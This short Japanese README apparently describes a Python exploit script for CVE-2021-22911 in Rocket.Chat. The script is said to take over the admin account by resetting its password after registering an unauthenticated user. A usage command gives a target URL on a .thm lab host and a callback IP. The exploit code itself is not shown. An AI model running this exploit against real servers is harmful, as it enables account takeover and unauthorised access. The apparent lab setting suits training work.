
CVE-2021-22911を対象としたPythonエクスプロイトスクリプト。Rocket.Chatの管理者パスワードリセットを、未認証ユーザー登録を経由して攻撃します。設定可能なターゲット、管理者ユーザー名、コールバックIPを使って自動化します。
既にユーザーを登録している場合、これは管理者パスワードのみをリセットし、両方はリセットしません。これにより、エクスプロイトの実行がはるかに高速になります。
python3 exploit.py -u test -a [email protected] -t http://chat.rocket.thm -i 10.10.4.24 -p 80